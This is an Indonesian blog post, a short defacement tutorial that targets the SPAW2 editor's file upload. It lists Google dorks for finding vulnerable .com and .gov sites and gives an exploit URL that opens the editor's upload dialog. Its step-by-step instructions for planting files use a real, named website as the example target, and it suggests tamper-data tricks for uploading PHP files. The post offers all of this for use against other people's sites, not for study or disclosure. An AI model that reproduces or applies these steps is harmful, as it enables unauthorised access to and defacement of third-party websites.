Kamis, 26 Mei 2016

Method Deface SPAWN File Upload

Kali ini gw mo share exploit lama ya, btw ini jga bwat ngisi artikel aja, haha
Di exploit ini kita cuman diperbolehkan nitip file dengan format:
.txt dan .html
so kalian juga bisa mencoba dengan method tamper data / yang lain jika ingin mengupload file .php
gw juga blom nyoba sih ke bbrapa site..
sjauh ini yg gw temuin mesti kena notif "Error: files of this type are not allowed."

Skarang lngsung ke caranya ja ya, ikutin langkah-langkahnya:

Dork :
- inurl:/spaw2/uploads/files/ site:.com
- inurl:/spaw2/uploads/files/ site:.gov
- Bisa di kembangin sndiri ya :)

Exploit :
site,com/path/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

Langkah -Langkah :
- Masukin dork tadi di gugel, pilih site terserahlu..
- di url site target ganti jadi seperti ini:
Sebelumnya
www.wholehealthamerica.com/spaw2/uploads/files/
Sesudah
http://www.wholehealthamerica.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file
- Ganti "Flash Movies" ke "Files", file type pilih All files (*.*).
- Sekarang Klik "Browse", pilih file mu. Jika sudah klik Upload
- Hasil file upload akan terUpload di site,com/path/spaw2/uploads/files/
- Jadi lngsung aja panggil file mu tadi dengan mengetikkan seperti ini:
http://www.wholehealthamerica.com/spaw2/uploads/files/ecf.txt
- Dah gitu aja gmpang kan :)

Semoga bermanfaat.

Tidak ada komentar:

Posting Komentar